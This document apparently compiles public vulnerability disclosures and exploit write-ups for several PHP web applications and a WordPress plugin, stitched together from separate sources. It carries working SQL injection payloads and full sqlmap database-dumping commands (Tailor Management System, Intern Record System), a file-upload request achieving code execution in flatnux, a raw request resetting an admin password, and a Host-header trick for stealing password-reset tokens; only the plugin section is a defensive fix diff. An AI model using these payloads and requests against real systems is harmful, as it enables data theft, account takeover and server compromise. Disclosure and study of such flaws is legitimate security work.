SQL injection vulnerability found in Tailor Management System v.1 allows a remote authenticated attacker to execute arbitrary code via the customer parameter of the email.php page.

**CVE-s + Tailor Management System V.1**

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > as you can see in email.php line 50 $result = $pdo->query("SELECT email FROM customer WHERE fullname='$customer'"); the parameter "$customer" is not filtered ,and without prepare statement .

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > you have to be authenticated , go to email.php file and full all the inputs with the necessary information, intercept the request using burp suite, and in the request you will see the method is post and the customer parameter will be exploitable , you will save the request and using sqlmap to exploit the vulnerability . Parameter: #1\* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer=0' AND (SELECT 2532 FROM (SELECT(SLEEP(5)))ZLDl) AND 'Dfud'='Dfud&template=Your Clothes are ready for collection. Thanks for your patronage&message=Dear 0, Your Clothes are ready for collection. Thanks for your patronage

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > by reviewing the source code, $oldd = $pdo->query("SELECT \* FROM customer WHERE id='".$eid."'"); line 90 $eid = $\_GET\["id"\]; line 41 no validation found while execution the query

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > after login navigate the this page : http://localhost/tailor/customeredit.php , and edit the user data you will see the parameter reflected in url like this : http://localhost/tailor/customeredit.php?id=1 , using the sqlmap with this link you should see the following Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 8449=8449 AND 'iurJ'='iurJ Type: time-based blind Title: MySQL < 5.0.12 OR time-based blind (heavy query) Payload: id=1' OR 3412=BENCHMARK(5000000,MD5(0x67504658)) AND 'Vzxv'='Vzxv Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-2894' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787671,0x526c664b74446c5277577653754f7146475152747377417975734579655658764766626e6869694a,0x7178787671),NULL,NULL-- pUIM

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > by reviewing the source code in document.php from line 43 to line 57 ( $detail = $\_POST\["detail"\]; ) ,execute the query in line 57 $res = $pdo->exec("INSERT INTO documents SET title='".$title."', detail='".$detail."', img='".$bgimg."'");

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > login and go http://localhost/tailor/document.php , set the document title and send the request , by intercept the request using burp suite and save the request and send it request to sqlmap this will confirm the vulnerability exist Parameter: MULTIPART #1\* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="title" ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="detail" aa' AND (SELECT 2393 FROM (SELECT(SLEEP(5)))JGfe) AND 'keIn'='keIn ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="bgimg"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryvizUXbIL1AEu2VY4--

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > by reviewing the source code in document.php from line 42 to line 57 ( $title = $\_POST\["title"\]; ) ,execute the query in line 57 $res = $pdo->exec("INSERT INTO documents SET title='".$title."', detail='".$detail."', img='".$bgimg."'");

> \[Attack Type\]
> 
> > Remote

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > After reviewing the source code for the software, I found that in orderadd.php file using unsafe way to insert the data from the requests without any validation. from line number 45 (the query ),and execute the query in line 54.

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > after login go to http://localhost:8080/tailor/tailor/orderadd.php page , then full out all the form , intercept the request by using burp suite and by using sqlmap with inject able point from the POST request { customer=_&desc=test&date\_received=&amount=1&paid=1&completed=Yes&date\_collected=2020-12-26 } , the customer. sqlmap data : (custom) POST parameter '#1_' is vulnerable. Do you want to keep testing the others (if any)? \[y/N\] N sqlmap identified the following injection point(s) with a total of 93 HTTP(s) requests: --- Parameter: #1\* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer=' AND (SELECT 9665 FROM (SELECT(SLEEP(5)))QEDW) AND 'dcCY'='dcCY&desc=
> > 
> > X&date\_receiv ed=&amount=1&paid=1&completed=Yes&date\_collected=2020-12-26 ==================================================================================--------

> \[Discoverer\]
> 
> > Abdallah Fouad Mohamed

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

Impact: he impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

CVE-2020-36071: CVE-s/README.md at main · Abdallah-Fouad-X/CVE-s

The Maps Widget for Google Maps for WordPress is vulnerable to Stored Cross-Site Scripting via widget settings in versions up to, and including, 4.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

**google-maps-widget/trunk/gmw-widget.php**

r2876127

r2893821

 

454

454

    }

455

455

456

 

    $instance\['title'\] = $new\_instance\['title'\];

457

 

    $instance\['address'\] = strip\_tags(trim($new\_instance\['address'\]));

458

 

459

 

    $instance\['thumb\_pin\_type'\] = $new\_instance\['thumb\_pin\_type'\];

460

 

    $instance\['thumb\_pin\_color'\] = GMW::sanitize\_hex\_color(@$new\_instance\['thumb\_pin\_color'\]);

461

 

    $instance\['thumb\_pin\_size'\] = $new\_instance\['thumb\_pin\_size'\];

462

 

    $instance\['thumb\_pin\_label'\] = $new\_instance\['thumb\_pin\_label'\];

463

 

    $instance\['thumb\_pin\_img'\] = trim($new\_instance\['thumb\_pin\_img'\]);

 

456

    $instance\['title'\] = sanitize\_text\_field($new\_instance\['title'\]);

 

457

    $instance\['address'\] = sanitize\_text\_field(trim($new\_instance\['address'\]));

 

458

 

459

    $instance\['thumb\_pin\_type'\] = sanitize\_text\_field($new\_instance\['thumb\_pin\_type'\]);

 

460

    $instance\['thumb\_pin\_color'\] = GMW::sanitize\_hex\_color(sanitize\_text\_field(@$new\_instance\['thumb\_pin\_color'\]));

 

461

    $instance\['thumb\_pin\_size'\] = sanitize\_text\_field($new\_instance\['thumb\_pin\_size'\]);

 

462

    $instance\['thumb\_pin\_label'\] = sanitize\_text\_field($new\_instance\['thumb\_pin\_label'\]);

 

463

    $instance\['thumb\_pin\_img'\] = sanitize\_text\_field(trim($new\_instance\['thumb\_pin\_img'\]));

464

464

    $instance\['thumb\_width'\] = min(640, max(50, (int) $new\_instance\['thumb\_width'\]));

465

465

    $instance\['thumb\_height'\] = min(640, max(50, (int) $new\_instance\['thumb\_height'\]));

466

 

    $instance\['thumb\_zoom'\] = $new\_instance\['thumb\_zoom'\];

467

 

    $instance\['thumb\_type'\] = @$new\_instance\['thumb\_type'\];

468

 

    $instance\['thumb\_link\_type'\] = $new\_instance\['thumb\_link\_type'\];

469

 

    $instance\['thumb\_link'\] = trim($new\_instance\['thumb\_link'\]);

470

 

    $instance\['thumb\_header'\] = trim($new\_instance\['thumb\_header'\]);

471

 

    $instance\['thumb\_footer'\] = trim($new\_instance\['thumb\_footer'\]);

472

 

    $instance\['thumb\_color\_scheme'\] = $new\_instance\['thumb\_color\_scheme'\];

473

 

    $instance\['thumb\_format'\] = $new\_instance\['thumb\_format'\];

474

 

    $instance\['thumb\_lang'\] = $new\_instance\['thumb\_lang'\];

475

 

    $instance\['thumb\_powered\_by'\] = $new\_instance\['thumb\_powered\_by'\];

476

 

    $instance\['thumb\_hide\_title'\] = $new\_instance\['thumb\_hide\_title'\];

 

466

    $instance\['thumb\_zoom'\] = sanitize\_text\_field($new\_instance\['thumb\_zoom'\]);

 

467

    $instance\['thumb\_type'\] = sanitize\_text\_field(@$new\_instance\['thumb\_type'\]);

 

468

    $instance\['thumb\_link\_type'\] = sanitize\_text\_field($new\_instance\['thumb\_link\_type'\]);

 

469

    $instance\['thumb\_link'\] = sanitize\_text\_field(trim($new\_instance\['thumb\_link'\]));

 

470

    $instance\['thumb\_header'\] = wp\_kses\_post(trim($new\_instance\['thumb\_header'\]));

 

471

    $instance\['thumb\_footer'\] = wp\_kses\_post(trim($new\_instance\['thumb\_footer'\]));

 

472

    $instance\['thumb\_color\_scheme'\] = sanitize\_text\_field($new\_instance\['thumb\_color\_scheme'\]);

 

473

    $instance\['thumb\_format'\] = sanitize\_text\_field($new\_instance\['thumb\_format'\]);

 

474

    $instance\['thumb\_lang'\] = sanitize\_text\_field($new\_instance\['thumb\_lang'\]);

 

475

    $instance\['thumb\_powered\_by'\] = sanitize\_text\_field($new\_instance\['thumb\_powered\_by'\]);

 

476

    $instance\['thumb\_hide\_title'\] = sanitize\_text\_field($new\_instance\['thumb\_hide\_title'\]);

477

477

478

478

    $instance\['lightbox\_fullscreen'\] = (int) $new\_instance\['lightbox\_fullscreen'\];

479

479

    $instance\['lightbox\_width'\] = min(2000, max(50, (int) $new\_instance\['lightbox\_width'\]));

480

480

    $instance\['lightbox\_height'\] = min(2000, max(50, (int) $new\_instance\['lightbox\_height'\]));

481

 

    $instance\['lightbox\_mode'\] = $new\_instance\['lightbox\_mode'\];

482

 

    $instance\['lightbox\_map\_type'\] = $new\_instance\['lightbox\_map\_type'\];

483

 

    $instance\['lightbox\_zoom'\] = $new\_instance\['lightbox\_zoom'\];

 

481

    $instance\['lightbox\_mode'\] = sanitize\_text\_field($new\_instance\['lightbox\_mode'\]);

 

482

    $instance\['lightbox\_map\_type'\] = sanitize\_text\_field($new\_instance\['lightbox\_map\_type'\]);

 

483

    $instance\['lightbox\_zoom'\] = sanitize\_text\_field($new\_instance\['lightbox\_zoom'\]);

484

484

    $instance\['lightbox\_feature'\] = (array) $new\_instance\['lightbox\_feature'\];

485

 

    $instance\['lightbox\_header'\] = trim($new\_instance\['lightbox\_header'\]);

486

 

    $instance\['lightbox\_footer'\] = trim($new\_instance\['lightbox\_footer'\]);

487

 

    $instance\['lightbox\_skin'\] = $new\_instance\['lightbox\_skin'\];

488

 

    $instance\['lightbox\_lang'\] = $new\_instance\['lightbox\_lang'\];

 

485

    $instance\['lightbox\_header'\] = wp\_kses\_post(trim($new\_instance\['lightbox\_header'\]));

 

486

    $instance\['lightbox\_footer'\] = wp\_kses\_post(trim($new\_instance\['lightbox\_footer'\]));

 

487

    $instance\['lightbox\_skin'\] = sanitize\_text\_field($new\_instance\['lightbox\_skin'\]);

 

488

    $instance\['lightbox\_lang'\] = sanitize\_text\_field($new\_instance\['lightbox\_lang'\]);

489

489

490

490

    $instance\['core\_ver'\] = GMW::$version;

**google-maps-widget/trunk/google-maps-widget.php**

r2876127

r2893821

 

5

5

Description: Display a single image super-fast loading Google Map in a widget. A larger, full featured map is available in a lightbox. Includes a user-friendly interface and numerous appearance options.

6

6

Author: WebFactory Ltd

7

 

Version: 4.24

 

7

Version: 4.25

8

8

Author URI: https://www.gmapswidget.com/

9

9

Text Domain: google-maps-widget

…

…

 

11

11

Requires at least: 4.0

12

12

Requires PHP: 5.2

13

 

Tested up to: 6.1

 

13

Tested up to: 6.2

14

14

15

15

  Copyright 2012 - 2023  WebFactory Ltd  (email : gmw@webfactoryltd.com)

**google-maps-widget/trunk/readme.txt**

r2876127

r2893821

 

5

5

License URI: http://www.gnu.org/licenses/gpl-2.0.html

6

6

Requires at least: 4.0

7

 

Tested up to: 6.1

8

 

Stable tag: 4.24

 

7

Tested up to: 6.2

 

8

Stable tag: 4.25

9

9

Requires PHP: 5.2

10

10

…

…

 

181

181

182

182

\== Changelog ==

 

183

\= 4.25 =

 

184

\* 2023/04/04

 

185

\* JavaScript is no longer accepted in the widget footer and header fields

183

186

184

187

\= 4.24 =

185

188

\* 2023/03/07

186

 

\* minor security fixe

 

189

\* minor security fixes

187

190

188

191

\= 4.23 =

CVE-2023-1913: Diff [2876127:2893821] for google-maps-widget/trunk – WordPress Plugin Repository

Unified Remote version 3.13.0 suffers from a remote code execution vulnerability.

Unified Remote 3.13.0 Remote Code Execution

flatnux version 2021-03.25 suffers from a remote code execution vulnerability.

    # Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated)# Exploit Author: Ömer Hasan Durmuş# Vendor Homepage: https://en.altervista.org# Software Link: http://flatnux.altervista.org/flatnux.html# Version: 2021-03.25# Tested on: Windows/LinuxPOST/flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=enHTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: multipart/form-data;boundary=---------------------------393526031113460918603940283286Content-Length: 413Origin: http://localhostConnection: closeReferer:http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnewCookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en;ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsbUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="upload"; filename="info.php"Content-Type: application/octet-stream<?php phpinfo(); ?>-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="ckCsrfToken"BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb-----------------------------393526031113460918603940283286--

flatnux 2021-03.25 Remote Code Execution

Auto Dealer Management System version 1.0 suffers from a broken access control vulnerability

# Exploit Title: Auto Dealer Management System 1.0 - Broken Access Control Exploit

It leads to compromise of all application accounts by accessing the ?page=user/list with low privileged user account

### Date:   
> 18 February 2023

### CVE Assigned: **[CVE-2023-0916](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0916)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0916) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0916)

### Author:   
> Muhammad Navaid Zafar Ansari  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

# Tested On: Windows 11 

### Affected Page:  
> list.php , manage_user.php

> On these page, application isn't verifying the authorization mechanism. Due to that, all the parameters are vulnerable to broken access control and low privilege user could view the list of user's and change any user password to access it.

### Description:  
> Broken access control allows low privilege attacker to change password of all application users

### Proof of Concept:  
> Following steps are involved:  
1. Visit the vulnerable page: ?page=user/list  
2. Click on Action and Edit the password of Admin

![image](https://user-images.githubusercontent.com/123810418/219884701-0f1feb4f-6c8a-4299-b510-1762461910ee.png)

4. Update the Password and Submit

5. Request:  
```  
POST /adms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 877  
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfODLB5j55MvB5pGU  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/adms/admin/?page=user/manage_user&id=1  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5  
Connection: close

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="id"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="firstname"

Adminstrator  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="middlename"

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="lastname"

Admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="username"

admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="password"

admin123  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryfODLB5j55MvB5pGU--

```  
6. Successful exploit screenshots are below (without cookie parameter)  
![image](https://user-images.githubusercontent.com/123810418/219884923-5283fca6-d509-4c48-9db0-f61ea6dbb352.png)

7. Vulnerable Code Snippets:

![image](https://user-images.githubusercontent.com/123810418/219884994-e74d7d48-4d45-4135-9a38-45e26c65434b.png)

![image](https://user-images.githubusercontent.com/123810418/219885023-a76afbe0-88f0-4aaa-89cd-1e541e511427.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  list.php , manage_user.php pages as per requirement to avoid a Broken Access Control attack

Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Auto Dealer Management System 1.0 Broken Access Control

LDAP Tool Box Self Service Password version 1.5.2 suffers from an account takeover vulnerability.

    # Exploit Title:  LDAP Tool Box Self Service Password v1.5.2 -  Account takeover# Date: 02/17/2023# Exploit Author: Tahar BENNACEF (aka tar.gz)# Software Link: https://github.com/ltb-project/self-service-password# Version: 1.5.2# Tested on: UbuntuSelf Service Password is a PHP application that allows users to changetheir password in an LDAP directory.It is very useful to get back an account with waiting an action from anadministration especially in Active Directory environmentThe password reset feature is prone to an HTTP Host header vulnerabilityallowing an attacker to tamper the password-reset mail sent to his victimallowing him to potentially steal his victim's valid reset token. Theattacker can then use it to perform account takeover*Step to reproduce*1. Request a password reset request targeting your victim and setting inthe request HTTP Host header the value of a server under your controlPOST /?action=sendtoken HTTP/1.1Host: *111.111.111.111*User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 16Origin: https://portal-lab.ngp.infraReferer: https://portal-lab.ngp.infra/?action=sendtokenUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closelogin=test.resetAs the vulnerable web application's relying on the Host header of thepassword-reset request to craft the password-reset mail. The victimreceive a mail with a tampered link[image: image.png]2. Start a webserver and wait for the victim to click on the linkIf the victim click on this tampered link, he will sent his password resettoken to the server set in the password-reset request's HTTP Host header[image: image.png]3. Use the stolen token to reset victim's account passwordBest regards

LDAP Tool Box Self Service Password 1.5.2 Account Takeover

Intern Record System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Intern Record System v1.0 - SQL Injection (Unauthenticated)# Date: 2022-06-09# Exploit Author: Hamdi Sevben# Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/# Software Link: https://download-media.code-projects.org/2020/03/Intern_Record_System_In_PHP_With_Source_Code.zip# Version: 1.0# Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53# CVE: CVE-2022-40347# References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40347https://github.com/h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated------------------------------------------------------------------------------------1. Description:----------------------Intern Record System 1.0 allows SQL Injection via parameters 'phone', 'email', 'deptType' and 'name' in /intern/controller.php Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.2. Proof of Concept:----------------------In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database. Then run SQLmap to extract the data from the database:sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dumpsqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dumpsqlmap.py -u "http://localhost/intern/controller.php" -p "name" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dumpsqlmap.py -u "http://localhost/intern/controller.php" -p "phone" --risk="3" --level="3" --method="POST" --data="phone=test&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump3. Example payload:-----------------------1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%274. Burpsuite request on 'phone' parameter:----------------------POST /intern/controller.php HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/intern/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36phone=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&email=&deptType=3&name=5. Burpsuite request on 'email' parameter:----------------------POST /intern/controller.php HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/intern/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36phone=&email=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&deptType=3&name=6. Burpsuite request on 'deptType' parameter:----------------------POST /intern/controller.php HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 316Content-Type: application/x-www-form-urlencodedReferer: http://localhost/intern/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36phone=&email=&deptType=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&name=7. Burpsuite request on 'name' parameter:----------------------POST /intern/controller.php HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/intern/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36phone=&email=&deptType=3&name=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

Intern Record System 1.0 SQL Injection

Simple Task Managing System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)# Date: 2022-01-09# Exploit Author: Hamdi Sevben# Vendor Homepage: https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/Task%20Managing%20System%20in%20PHP.zip# Version: 1.0# Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53# CVE: CVE-2022-40032# References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40032https://github.com/h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated------------------------------------------------------------------------------------1. Description:----------------------Simple Task Managing System 1.0 allows SQL Injection via parameters 'login' and 'password' in /TaskManagingSystem/login.php Exploiting this issue could allow an attacker to compromise the 